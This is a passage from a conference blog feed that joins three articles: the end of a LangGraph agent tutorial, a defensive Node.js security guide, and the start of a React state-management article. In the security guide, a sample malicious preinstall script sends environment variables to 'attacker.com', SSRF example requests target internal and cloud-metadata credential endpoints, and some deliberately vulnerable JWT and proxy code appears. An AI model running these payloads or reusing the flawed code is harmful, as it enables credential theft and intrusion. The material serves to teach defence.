  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and enter the StateGraph. The graph of this application forms a cycle, so you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only applies if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To raise the limit and increase the possible shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.
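
For example, raising the limit when invoking the compiled graph could look like this:

// Raise the cycle limit from the default of 25 to 100
app.invoke({ totalPrice: 0, cart: [] }, { recursionLimit: 100 });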

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The connections between these nodes and the edges determine the flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application and pause your application if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move the implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition, validation, and TypeScript.

🔍 Frequently Asked Questions (FAQ)

1. What is LangGraph and how does it differ from LangChain?

LangGraph is a library for building AI agents using graph-based architecture in JavaScript or TypeScript. Unlike LangChain, which connects components in a linear chain, LangGraph uses nodes and edges to model dynamic control flows including branching and looping.

2. How do AI agents differ from traditional LLM-powered applications?

AI agents act autonomously within defined environments, continuously observe their surroundings, and make decisions based on long-term goals. This is in contrast to typical LLM applications, which respond only to direct prompts without proactive behavior.

3. What are the core components of a LangGraph application?

The three main components are nodes (functions that perform tasks), edges (transitions between nodes), and the state (a shared data object accessible and modifiable by all nodes). LangGraph also supports conditional logic via conditional edges and manages state updates through reducer functions and annotations.

4. Can LangGraph applications access real-time data?

Yes. LangGraph can integrate tools as nodes—for instance, a node that returns the current UTC date and time—allowing applications to supplement static model knowledge with dynamic, real-world data.

5. What role does the ToolNode play in a LangGraph setup?

The ToolNode provides real-time or auxiliary functionality by executing predefined logic, such as accessing current timestamps or running a custom function. It can be triggered by the model when a specific task cannot be completed with its internal knowledge alone.

6. How does LangGraph handle conditional logic and tool invocation?

LangGraph supports conditional edges via methods like addConditionalEdges. These allow the graph to evaluate conditions (e.g., tool calls in the model output) and dynamically choose which node to execute next.

7. How does the digital shopping cart example showcase LangGraph’s flexibility?

The digital shopping cart uses LangGraph nodes for reading product images, recognizing items via vision models, querying a database for prices, and calculating totals. This highlights how LangGraph enables stateful, multi-step applications beyond basic chatbot use cases.

8. Why is centralized state important in LangGraph applications?

Centralized state allows for easy debugging, flexible data exchange between nodes, and the ability to persist and resume sessions. This design makes LangGraph particularly suited for complex workflows that require memory and context retention across multiple steps.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection, NoSQL injection, to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only a part of it.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

The JavaScript ecosystem is heavily dependent on third-party packages. A typical Node.js project depends on hundreds of them, a huge attack surface that isn’t contained in your own code, as recent supply chain attacks on popular npm packages have shown. Not all security threats can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty remains with developers to include security checks and measures in every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic, and vulnerabilities in widely used packages are frequently uncovered and patched. Dependencies that aren’t regularly updated can therefore leave your application exposed to known exploits even though a fix is already available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies
npm audit

# Fix vulnerable dependencies
npm audit fix

# For major version updates that npm audit fix can't automatically resolve
npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges
{
  "dependencies": {
    "express": "4.17.1",  // Good: exact version
    "lodash": "^4.17.20"  // Risky: accepts any 4.x version at or above 4.17.20
  }
}

//Use package-lock.json or npm shrinkwrap to lock all dependencies
//Example using npm-package-integrity:
const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {
  if (results.compromised.length > 0) {
    console.error('Compromised packages detected:', results.compromised);
    process.exit(1);
  }
});
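
To make the lockfile binding in practice, CI pipelines commonly install with npm ci, which installs exactly what package-lock.json specifies and fails on any mismatch:

# Reproducible install: uses package-lock.json verbatim and
# aborts if it disagrees with package.json
npm ci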

Dependency Confusion Attacks

Dependency confusion attacks occur when a package manager resolves dependencies from both public and private registries. If an attacker publishes a package to the public registry under the same name as a private package but with a higher version number, the package manager may pull the malicious public version instead of the intended private one.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you next install your dependencies, npm finds the higher version in the public registry and installs the attacker’s package.

Example Workflow:

  1. Once the malicious package is installed, a preinstall script defined by the attacker runs automatically:
// Malicious package preinstall script
// This runs automatically when the package is installed
const fs = require('fs');
const https = require('https');

// Stealing environment variables
const data = JSON.stringify({
  env: process.env,
  path: process.cwd()
});

// Sending data to attacker's server
const req = https.request({
  hostname: 'attacker.com',
  port: 443,
  path: '/collect',
  method: 'POST',
  headers: {'Content-Type': 'application/json'}
}, res => {});

req.write(data);
req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{
  "name": "my-project",
  "version": "1.0.0",
  "dependencies": {
    "@yourcompany/internal-package": "1.2.3"
  },
  "publishConfig": {
    "registry": "https://registry.yourcompany.com"
  }
}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, they are frequently implemented insecurely.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: Using the none algorithm or insecure algorithms like HMAC with short keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Failing to verify a token’s signature, expiration, issuer, or audience.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code
const secret = 'mysecretkey';

app.post('/login', (req, res) => {
  // Create token with no expiration or audience validation
  const token = jwt.sign({ userId: user.id }, secret);
  res.json({ token });
});

app.get('/protected', (req, res) => {
  try {
    // No token validation or structure checks
    const token = req.headers.authorization.split(' ')[1];
    const decoded = jwt.verify(token, secret);

    // No additional checks on decoded token content
    res.json({ data: 'Protected resource' });
  } catch (error) {
    res.status(401).json({ error: 'Unauthorized' });
  }
});

In the above example code, there are multiple issues:

Hardcoded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Problem: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');
const fs = require('fs');
require('dotenv').config();

// Load JWT secret from environment variable
const secret = process.env.JWT_SECRET;
if (!secret || secret.length < 32) {
  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
}

app.post('/login', async (req, res) => {
  // Create token with proper claims
  const token = jwt.sign(
    {
      userId: user.id,
      role: user.role
    },
    secret,
    {
      expiresIn: '1h',
      issuer: 'my-app',
      audience: 'my-api',
      notBefore: 0
    }
  );

  // Send token in HttpOnly cookie
  res.cookie('token', token, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production',
    sameSite: 'strict',
    maxAge: 3600000 // 1 hour
  });

  res.json({ message: 'Authentication successful' });
});

app.get('/protected', (req, res) => {
  try {
    // Extract token from cookie, not from headers
    // (reading req.cookies requires the cookie-parser middleware)
    const token = req.cookies.token;

    if (!token) {
      return res.status(401).json({ error: 'Authentication required' });
    }

    // Verify token with all necessary options
    const decoded = jwt.verify(token, secret, {
      issuer: 'my-app',
      audience: 'my-api'
    });

    // Additional validation
    if (decoded.role !== 'admin') {
      return res.status(403).json({ error: 'Insufficient permissions' });
    }

    res.json({ data: 'Protected resource' });
  } catch (error) {
    if (error.name === 'TokenExpiredError') {
      return res.status(401).json({ error: 'Token expired' });
    }
    res.status(401).json({ error: 'Invalid token' });
  }
});

The above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT is stored in an HttpOnly cookie with the secure and SameSite=strict flags, mitigating XSS and CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Server-Side Request Forgery (SSRF) is a type of vulnerability where attackers can make the server send requests to unintended targets. This is a particular concern in the Node.js environment, where HTTP requests are easy to make, especially with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/proxy', async (req, res) => {
  const url = req.query.url;
  try {
    // User can control the URL completely
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s look at a secure implementation:

const express = require('express');
const axios = require('axios');
const URL = require('url').URL;
const app = express();

// Define allowed domains
const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];

app.get('/proxy', async (req, res) => {
  const url = req.query.url;

  try {
    // Validate URL format
    const parsedUrl = new URL(url);
    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {
      return res.status(403).json({ error: 'Domain not allowed' });
    }

    // Proceed with request to allowed domain
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Then we check if the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.

2. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // Downloads from any URL without validation
    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });
    const imageBuffer = Buffer.from(response.data);

    // Save to local storage
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Look up the hostname to IP using dns lookup. Avoid using private networks (10.x.x.x, 172.16.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) to avoid disclosing information that can be used to reach resources on the internal network and to prevent SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // 1. Validate URL format
    const parsedUrl = new URL(imageUrl);

    // 2. Only allow http/https protocols
    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {
      return res.status(403).json({ error: 'Protocol not allowed' });
    }

    // 3. Resolve hostname to IP
    const { address } = await dns.lookup(parsedUrl.hostname);

    // 4. Block private IP ranges
    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {
      return res.status(403).json({ error: 'Cannot access internal resources' });
    }

    // 5. Now safe to proceed
    const response = await axios.get(imageUrl, {
      responseType: 'arraybuffer',
      maxRedirects: 0 // Prevent redirect-based bypasses
    });

    const imageBuffer = Buffer.from(response.data);
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock them offline or take them over:

  1. Distributed Denial of Service (DDoS): Your server is flooded with so many requests from so many attackers that legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools that try many credential combinations in an attempt to guess valid authentication credentials.
  3. Scraping and Harvesting: Bots make many requests to harvest content from your application, degrading performance and leaking data.
  4. API Abuse: Excessive API requests that exhaust resources or abuse the free tiers of your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');

const apiLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // limit each IP to 100 requests per windowMs
  message: 'Too many requests, please try again later.'
});

app.use('/api/', apiLimiter); // Apply to all API endpoints

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints usually need stricter limits than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The node-rate-limiter-flexible library adds features like Redis-based distributed rate limiting for apps deployed across multiple servers.
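
As a minimal sketch of such a distributed limiter, the following assumes a running Redis instance, the ioredis client, and the rate-limiter-flexible package; the key prefix and limits are illustrative:

const { RateLimiterRedis } = require('rate-limiter-flexible');
const Redis = require('ioredis');

const redisClient = new Redis({ enableOfflineQueue: false });

const loginLimiter = new RateLimiterRedis({
  storeClient: redisClient,
  keyPrefix: 'login',
  points: 5,          // 5 attempts
  duration: 60,       // per 60 seconds per key (here: per IP)
  blockDuration: 300  // block for 5 minutes once the limit is hit
});

app.post('/login', async (req, res, next) => {
  try {
    await loginLimiter.consume(req.ip); // rejects when the limit is exceeded
    next();
  } catch {
    res.status(429).json({ error: 'Too many login attempts, try again later.' });
  }
});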

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));
app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');
app.use(helmet());

Infrastructure-Level Protection

Security is best approached at the infrastructure level, with application-level measures as a secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can serve as a barrier, perform rate limiting, and work as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offers integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: Distribute traffic across multiple instances, absorbing load spikes and filtering suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • Defense in depth is essential: Combine application-level protections such as middleware and request limits with infrastructure-level defenses like reverse proxies, CDNs, and WAFs to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: Effective protection requires understanding strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Escalate step by step, beginning with slight delays, then temporary blocks, and finally permanent IP bans for severe offenders, according to the frequency and severity of suspicious activity.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Some recommended libraries include express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and making potential critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10. How can infrastructure-level protection enhance Node.js app security?

Infrastructural tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common ancestor, i.e., the parent component of all components that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very tight coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it means useCart was called outside of a CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext in detail and performs the state update itself in the callback passed to the setCart function. You can solve this by extracting this block into a separate function. That way, not only the ListItem component but every component in the application can access the functionality.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

